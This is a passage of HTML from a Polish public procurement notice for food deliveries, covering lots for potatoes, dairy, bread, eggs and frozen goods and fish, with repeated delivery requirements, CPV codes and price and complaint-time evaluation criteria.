class="mb-0">03221000-6 - Warzywa</p> <p class="mb-0">15300000-1 - Owoce, warzywa i podobne produkty</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin rozpatrzenia reklamacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Ziemniaki<br/> 3.	Opis przedmiotu zamówienia:<br/>1)	Wszystkie produkty wchodzące w skład pakietów/części muszą charakteryzować się I Klasa jakości oraz być zgodne z obowiązującymi normami jakości;<br/>2)	produkty muszą być dostarczone w oryginalnych, nie uszkodzonych, szczelnie zamkniętych, prawidłowo oznakowanych w języku polskim opakowaniach;<br/>3)	wszystkie produkty muszą posiadać niezbędne dokumenty badań i dopuszczenia do obrotu oraz certyfikaty i atesty wymagane stosowanymi przepisami i normami, dokumenty, które Wykonawca jest zobowiązany do przedstawienia Zamawiającemu, na jego żądanie na każdym etapie obowiązywania umowy;<br/>4)	wielkości opakowania w przypadku stosowania przez producentów dodatkowych ilości w formie gratisów lub dodatków do opakowania podstawowego Zamawiający będzie rozumiał jako faktyczną łączną wielkością opakowania;<br/>5)	w przypadku zmiany wielkości opakowania, wprowadzonej przez producenta, zamawiający przewiduje zmianę sposobu konfekcjonowania z zachowaniem zasady proporcjonalności w stosunku do ceny objętej umową, na pisemny wniosek Wykonawcy, pod warunkiem uzyskania pisemnej zgody Zamawiającego;<br/>6)	w przypadku wstrzymania lub zakończenia produkcji towarów będących przedmiotem dostaw, Zamawiający przewiduje dostawę odpowiedników towarów objętych umową, o parametrach nie gorszych niż towary objęte umową, przy zachowaniu ceny ofertowej dla danego towaru, na podstawie pisemnego wniosku Wykonawcy, pod warunkiem uzyskania pisemnej zgody Zamawiającego;<br/>7)	przedmiotem dostawy, nie mogą być produkty zawierające dodatki do żywności niewskazane w diecie dzieci; <br/>8)	Zamawiający wymaga, aby dostarczone produkty w dniu dostawy posiadały termin przydatności do spożycia nie krótszy niż 3/4 terminu liczonego od dnia wyprodukowania, oznaczonego przez producenta na dostarczonym artykule;<br/>9)	Wykonawca musi wykazywać dyspozycyjność w każdym dniu roboczym. Zamawiający nie będzie dostosowywał terminów dostaw do możliwości logistycznych i dystrybucyjnych Wykonawcy;<br/>10)	Wykonawca zagwarantuje, że dostarczany towaru, sposób jego opakowania i transportu spełni wymagania określone w krajowych i unijnych przepisach prawa żywnościowego.<br/>11)	W przypadku podania w formularzach asortymentowo-cenowych – zał. nr 2A – 2H do SWZ gramatury opakowania lub wagi produkty Zamawiający dopuszcza tolerancje (+/-) 5%.<br/>12)	W przypadku podania w formularzach asortymentowo-cenowych – zał. nr 2A – 2H do SWZ wartości procentowej składnika, Zamawiający rozumie to jako wartość minimalną.<br/>13)	dostawy towaru:<br/>a)	jakość towaru musi być zgodna z obowiązującymi normami jakości, musi spełniać określone wymagania zgodnie z warunkami określonymi w projekcie umowy – zał. nr 5 do SWZ oraz w formularzach asortymentowo-cenowych zał. nr 2A – 2H do SWZ,<br/>b)	dostawy produktów realizowanych będą zgodnie z wymogami systemu HACCP,<br/>c)	częstotliwość dostaw zgodnie z zapisami określonymi w projekcie umowy – zał. nr 5 do SWZ,<br/>d)	przy każdej dostawie mięsa i wędlin Zamawiający będzie żądał od Wykonawcy wymaganych prawem dokumentów: HDI (Handlowy Dokument Identyfikacji),<br/>e)	Zamawiający nie posiada magazynów żywności, tym samym wymagana jest dyspozycyjność dowozu w trybie stałym, towar może być zamawiany z dnia na dzień, we wszystkie dni robocze tygodnia z obowiązkiem dostawy na następny dzień.<br/>f)	przez dostawę Zamawiający rozumie dostawę wyspecyfikowanych produktów, przystosowanym do tego celu środkiem transportu oraz ich rozładunek, wydanie, wniesienie i zeskładowanie do miejsca wskazanego przez Intendenta lub pracownika kuchni. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15300000-1 - Owoce, warzywa i podobne produkty</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin rozpatrzenia reklamacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Nabiał<br/> 3.	Opis przedmiotu zamówienia:<br/>1)	Wszystkie produkty wchodzące w skład pakietów/części muszą charakteryzować się I Klasa jakości oraz być zgodne z obowiązującymi normami jakości;<br/>2)	produkty muszą być dostarczone w oryginalnych, nie uszkodzonych, szczelnie zamkniętych, prawidłowo oznakowanych w języku polskim opakowaniach;<br/>3)	wszystkie produkty muszą posiadać niezbędne dokumenty badań i dopuszczenia do obrotu oraz certyfikaty i atesty wymagane stosowanymi przepisami i normami, dokumenty, które Wykonawca jest zobowiązany do przedstawienia Zamawiającemu, na jego żądanie na każdym etapie obowiązywania umowy;<br/>4)	wielkości opakowania w przypadku stosowania przez producentów dodatkowych ilości w formie gratisów lub dodatków do opakowania podstawowego Zamawiający będzie rozumiał jako faktyczną łączną wielkością opakowania;<br/>5)	w przypadku zmiany wielkości opakowania, wprowadzonej przez producenta, zamawiający przewiduje zmianę sposobu konfekcjonowania z zachowaniem zasady proporcjonalności w stosunku do ceny objętej umową, na pisemny wniosek Wykonawcy, pod warunkiem uzyskania pisemnej zgody Zamawiającego;<br/>6)	w przypadku wstrzymania lub zakończenia produkcji towarów będących przedmiotem dostaw, Zamawiający przewiduje dostawę odpowiedników towarów objętych umową, o parametrach nie gorszych niż towary objęte umową, przy zachowaniu ceny ofertowej dla danego towaru, na podstawie pisemnego wniosku Wykonawcy, pod warunkiem uzyskania pisemnej zgody Zamawiającego;<br/>7)	przedmiotem dostawy, nie mogą być produkty zawierające dodatki do żywności niewskazane w diecie dzieci; <br/>8)	Zamawiający wymaga, aby dostarczone produkty w dniu dostawy posiadały termin przydatności do spożycia nie krótszy niż 3/4 terminu liczonego od dnia wyprodukowania, oznaczonego przez producenta na dostarczonym artykule;<br/>9)	Wykonawca musi wykazywać dyspozycyjność w każdym dniu roboczym. Zamawiający nie będzie dostosowywał terminów dostaw do możliwości logistycznych i dystrybucyjnych Wykonawcy;<br/>10)	Wykonawca zagwarantuje, że dostarczany towaru, sposób jego opakowania i transportu spełni wymagania określone w krajowych i unijnych przepisach prawa żywnościowego.<br/>11)	W przypadku podania w formularzach asortymentowo-cenowych – zał. nr 2A – 2H do SWZ gramatury opakowania lub wagi produkty Zamawiający dopuszcza tolerancje (+/-) 5%.<br/>12)	W przypadku podania w formularzach asortymentowo-cenowych – zał. nr 2A – 2H do SWZ wartości procentowej składnika, Zamawiający rozumie to jako wartość minimalną.<br/>13)	dostawy towaru:<br/>a)	jakość towaru musi być zgodna z obowiązującymi normami jakości, musi spełniać określone wymagania zgodnie z warunkami określonymi w projekcie umowy – zał. nr 5 do SWZ oraz w formularzach asortymentowo-cenowych zał. nr 2A – 2H do SWZ,<br/>b)	dostawy produktów realizowanych będą zgodnie z wymogami systemu HACCP,<br/>c)	częstotliwość dostaw zgodnie z zapisami określonymi w projekcie umowy – zał. nr 5 do SWZ,<br/>d)	przy każdej dostawie mięsa i wędlin Zamawiający będzie żądał od Wykonawcy wymaganych prawem dokumentów: HDI (Handlowy Dokument Identyfikacji),<br/>e)	Zamawiający nie posiada magazynów żywności, tym samym wymagana jest dyspozycyjność dowozu w trybie stałym, towar może być zamawiany z dnia na dzień, we wszystkie dni robocze tygodnia z obowiązkiem dostawy na następny dzień.<br/>f)	przez dostawę Zamawiający rozumie dostawę wyspecyfikowanych produktów, przystosowanym do tego celu środkiem transportu oraz ich rozładunek, wydanie, wniesienie i zeskładowanie do miejsca wskazanego przez Intendenta lub pracownika kuchni. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15500000-3 - Produkty mleczarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin rozpatrzenia reklamacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pieczywo<br/> 3.	Opis przedmiotu zamówienia:<br/>1)	Wszystkie produkty wchodzące w skład pakietów/części muszą charakteryzować się I Klasa jakości oraz być zgodne z obowiązującymi normami jakości;<br/>2)	produkty muszą być dostarczone w oryginalnych, nie uszkodzonych, szczelnie zamkniętych, prawidłowo oznakowanych w języku polskim opakowaniach;<br/>3)	wszystkie produkty muszą posiadać niezbędne dokumenty badań i dopuszczenia do obrotu oraz certyfikaty i atesty wymagane stosowanymi przepisami i normami, dokumenty, które Wykonawca jest zobowiązany do przedstawienia Zamawiającemu, na jego żądanie na każdym etapie obowiązywania umowy;<br/>4)	wielkości opakowania w przypadku stosowania przez producentów dodatkowych ilości w formie gratisów lub dodatków do opakowania podstawowego Zamawiający będzie rozumiał jako faktyczną łączną wielkością opakowania;<br/>5)	w przypadku zmiany wielkości opakowania, wprowadzonej przez producenta, zamawiający przewiduje zmianę sposobu konfekcjonowania z zachowaniem zasady proporcjonalności w stosunku do ceny objętej umową, na pisemny wniosek Wykonawcy, pod warunkiem uzyskania pisemnej zgody Zamawiającego;<br/>6)	w przypadku wstrzymania lub zakończenia produkcji towarów będących przedmiotem dostaw, Zamawiający przewiduje dostawę odpowiedników towarów objętych umową, o parametrach nie gorszych niż towary objęte umową, przy zachowaniu ceny ofertowej dla danego towaru, na podstawie pisemnego wniosku Wykonawcy, pod warunkiem uzyskania pisemnej zgody Zamawiającego;<br/>7)	przedmiotem dostawy, nie mogą być produkty zawierające dodatki do żywności niewskazane w diecie dzieci; <br/>8)	Zamawiający wymaga, aby dostarczone produkty w dniu dostawy posiadały termin przydatności do spożycia nie krótszy niż 3/4 terminu liczonego od dnia wyprodukowania, oznaczonego przez producenta na dostarczonym artykule;<br/>9)	Wykonawca musi wykazywać dyspozycyjność w każdym dniu roboczym. Zamawiający nie będzie dostosowywał terminów dostaw do możliwości logistycznych i dystrybucyjnych Wykonawcy;<br/>10)	Wykonawca zagwarantuje, że dostarczany towaru, sposób jego opakowania i transportu spełni wymagania określone w krajowych i unijnych przepisach prawa żywnościowego.<br/>11)	W przypadku podania w formularzach asortymentowo-cenowych – zał. nr 2A – 2H do SWZ gramatury opakowania lub wagi produkty Zamawiający dopuszcza tolerancje (+/-) 5%.<br/>12)	W przypadku podania w formularzach asortymentowo-cenowych – zał. nr 2A – 2H do SWZ wartości procentowej składnika, Zamawiający rozumie to jako wartość minimalną.<br/>13)	dostawy towaru:<br/>a)	jakość towaru musi być zgodna z obowiązującymi normami jakości, musi spełniać określone wymagania zgodnie z warunkami określonymi w projekcie umowy – zał. nr 5 do SWZ oraz w formularzach asortymentowo-cenowych zał. nr 2A – 2H do SWZ,<br/>b)	dostawy produktów realizowanych będą zgodnie z wymogami systemu HACCP,<br/>c)	częstotliwość dostaw zgodnie z zapisami określonymi w projekcie umowy – zał. nr 5 do SWZ,<br/>d)	przy każdej dostawie mięsa i wędlin Zamawiający będzie żądał od Wykonawcy wymaganych prawem dokumentów: HDI (Handlowy Dokument Identyfikacji),<br/>e)	Zamawiający nie posiada magazynów żywności, tym samym wymagana jest dyspozycyjność dowozu w trybie stałym, towar może być zamawiany z dnia na dzień, we wszystkie dni robocze tygodnia z obowiązkiem dostawy na następny dzień.<br/>f)	przez dostawę Zamawiający rozumie dostawę wyspecyfikowanych produktów, przystosowanym do tego celu środkiem transportu oraz ich rozładunek, wydanie, wniesienie i zeskładowanie do miejsca wskazanego przez Intendenta lub pracownika kuchni. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15610000-7 - Produkty przemiału ziarna</p> <p class="mb-0">15810000-9 - Pieczywo, świeże wyroby piekarskie i ciastkarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin rozpatrzenia reklamacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Jaja świeże<br/> 3.	Opis przedmiotu zamówienia:<br/>1)	Wszystkie produkty wchodzące w skład pakietów/części muszą charakteryzować się I Klasa jakości oraz być zgodne z obowiązującymi normami jakości;<br/>2)	produkty muszą być dostarczone w oryginalnych, nie uszkodzonych, szczelnie zamkniętych, prawidłowo oznakowanych w języku polskim opakowaniach;<br/>3)	wszystkie produkty muszą posiadać niezbędne dokumenty badań i dopuszczenia do obrotu oraz certyfikaty i atesty wymagane stosowanymi przepisami i normami, dokumenty, które Wykonawca jest zobowiązany do przedstawienia Zamawiającemu, na jego żądanie na każdym etapie obowiązywania umowy;<br/>4)	wielkości opakowania w przypadku stosowania przez producentów dodatkowych ilości w formie gratisów lub dodatków do opakowania podstawowego Zamawiający będzie rozumiał jako faktyczną łączną wielkością opakowania;<br/>5)	w przypadku zmiany wielkości opakowania, wprowadzonej przez producenta, zamawiający przewiduje zmianę sposobu konfekcjonowania z zachowaniem zasady proporcjonalności w stosunku do ceny objętej umową, na pisemny wniosek Wykonawcy, pod warunkiem uzyskania pisemnej zgody Zamawiającego;<br/>6)	w przypadku wstrzymania lub zakończenia produkcji towarów będących przedmiotem dostaw, Zamawiający przewiduje dostawę odpowiedników towarów objętych umową, o parametrach nie gorszych niż towary objęte umową, przy zachowaniu ceny ofertowej dla danego towaru, na podstawie pisemnego wniosku Wykonawcy, pod warunkiem uzyskania pisemnej zgody Zamawiającego;<br/>7)	przedmiotem dostawy, nie mogą być produkty zawierające dodatki do żywności niewskazane w diecie dzieci; <br/>8)	Zamawiający wymaga, aby dostarczone produkty w dniu dostawy posiadały termin przydatności do spożycia nie krótszy niż 3/4 terminu liczonego od dnia wyprodukowania, oznaczonego przez producenta na dostarczonym artykule;<br/>9)	Wykonawca musi wykazywać dyspozycyjność w każdym dniu roboczym. Zamawiający nie będzie dostosowywał terminów dostaw do możliwości logistycznych i dystrybucyjnych Wykonawcy;<br/>10)	Wykonawca zagwarantuje, że dostarczany towaru, sposób jego opakowania i transportu spełni wymagania określone w krajowych i unijnych przepisach prawa żywnościowego.<br/>11)	W przypadku podania w formularzach asortymentowo-cenowych – zał. nr 2A – 2H do SWZ gramatury opakowania lub wagi produkty Zamawiający dopuszcza tolerancje (+/-) 5%.<br/>12)	W przypadku podania w formularzach asortymentowo-cenowych – zał. nr 2A – 2H do SWZ wartości procentowej składnika, Zamawiający rozumie to jako wartość minimalną.<br/>13)	dostawy towaru:<br/>a)	jakość towaru musi być zgodna z obowiązującymi normami jakości, musi spełniać określone wymagania zgodnie z warunkami określonymi w projekcie umowy – zał. nr 5 do SWZ oraz w formularzach asortymentowo-cenowych zał. nr 2A – 2H do SWZ,<br/>b)	dostawy produktów realizowanych będą zgodnie z wymogami systemu HACCP,<br/>c)	częstotliwość dostaw zgodnie z zapisami określonymi w projekcie umowy – zał. nr 5 do SWZ,<br/>d)	przy każdej dostawie mięsa i wędlin Zamawiający będzie żądał od Wykonawcy wymaganych prawem dokumentów: HDI (Handlowy Dokument Identyfikacji),<br/>e)	Zamawiający nie posiada magazynów żywności, tym samym wymagana jest dyspozycyjność dowozu w trybie stałym, towar może być zamawiany z dnia na dzień, we wszystkie dni robocze tygodnia z obowiązkiem dostawy na następny dzień.<br/>f)	przez dostawę Zamawiający rozumie dostawę wyspecyfikowanych produktów, przystosowanym do tego celu środkiem transportu oraz ich rozładunek, wydanie, wniesienie i zeskładowanie do miejsca wskazanego przez Intendenta lub pracownika kuchni. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">03142500-3 - Jaja</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin rozpatrzenia reklamacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Mrożonki i ryby<br/> 3.	Opis przedmiotu zamówienia:<br/>1)	Wszystkie produkty wchodzące w skład pakietów/części muszą charakteryzować się I Klasa jakości oraz być zgodne z obowiązującymi normami jakości;<br/>2)	produkty muszą być dostarczone w oryginalnych, nie uszkodzonych, szczelnie zamkniętych, prawidłowo oznakowanych w języku polskim opakowaniach;<br/>3)	wszystkie produkty muszą posiadać niezbędne dokumenty badań i dopuszczenia do obrotu oraz certyfikaty i atesty wymagane stosowanymi przepisami i normami, dokumenty, które Wykonawca jest zobowiązany do przedstawienia Zamawiającemu, na jego żądanie na każdym etapie obowiązywania umowy;<br/>4)	wielkości opakowania w przypadku stosowania przez producentów dodatkowych ilości w formie gratisów lub dodatków do opakowania podstawowego Zamawiający będzie rozumiał jako faktyczną łączną wielkością opakowania;<br/>5)	w przypadku zmiany wielkości opakowania, wprowadzonej przez producenta, zamawiający przewiduje zmianę sposobu konfekcjonowania z zachowaniem zasady proporcjonalności w stosunku do ceny objętej umową, na pisemny wniosek Wykonawcy, pod warunkiem uzyskania pisemnej zgody Zamawiającego;<br/>6)	w przypadku wstrzymania lub zakończenia produkcji towarów będących przedmiotem dostaw, Zamawiający przewiduje dostawę odpowiedników towarów objętych umową, o parametrach nie gorszych niż towary objęte umową, przy zachowaniu ceny ofertowej dla danego towaru, na podstawie pisemnego wniosku Wykonawcy, pod warunkiem uzyskania pisemnej zgody Zamawiającego;<br/>7)	przedmiotem dostawy, nie mogą być produkty zawierające dodatki do żywności niewskazane w diecie dzieci; <br/>8)	Zamawiający wymaga, aby dostarczone produkty w dniu dostawy posiadały termin przydatności do spożycia nie krótszy niż 3/4 terminu liczonego od dnia wyprodukowania, oznaczonego przez producenta na dostarczonym artykule;<br/>9)	Wykonawca musi wykazywać dyspozycyjność w każdym dniu roboczym. Zamawiający nie będzie dostosowywał terminów dostaw do możliwości logistycznych i dystrybucyjnych Wykonawcy;<br/>10)	Wykonawca zagwarantuje, że dostarczany towaru, sposób jego opakowania i transportu spełni wymagania określone w krajowych i unijnych przepisach prawa żywnościowego.<br/>11)	W przypadku podania w formularzach asortymentowo-cenowych – zał. nr 2A – 2H do SWZ gramatury opakowania lub wagi produkty Zamawiający dopuszcza tolerancje (+/-) 5%.<br/>12)	W przypadku podania w formularzach asortymentowo-cenowych – zał. nr 2A – 2H do SWZ wartości procentowej składnika, Zamawiający rozumie to jako wartość minimalną.<br/>13)	dostawy towaru:<br/>a)	jakość towaru musi być zgodna z obowiązującymi normami jakości, musi spełniać określone wymagania zgodnie z warunkami określonymi w projekcie umowy – zał. nr 5 do SWZ oraz w formularzach asortymentowo-cenowych zał. nr 2A – 2H do SWZ,<br/>b)	dostawy produktów realizowanych będą zgodnie z wymogami systemu HACCP,<br/>c)	częstotliwość dostaw zgodnie z zapisami określonymi w projekcie umowy – zał. nr 5 do SWZ,<br/>d)	przy każdej dostawie mięsa i wędlin Zamawiający będzie żądał od Wykonawcy wymaganych prawem dokumentów: HDI (Handlowy Dokument Identyfikacji),<br/>e)	Zamawiający nie posiada magazynów żywności, tym samym wymagana jest dyspozycyjność dowozu w trybie stałym, towar może być zamawiany z dnia na dzień, we wszystkie dni robocze tygodnia z obowiązkiem dostawy na następny dzień.<br/>f)	przez dostawę Zamawiający rozumie dostawę wyspecyfikowanych produktów, przystosowanym do tego celu środkiem transportu oraz ich rozładunek, wydanie, wniesienie i zeskładowanie do miejsca wskazanego przez Intendenta lub pracownika kuchni. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15220000-6 - Ryby mrożone, filety rybne i pozostałe mięso ryb</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin rozpatrzenia reklamacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 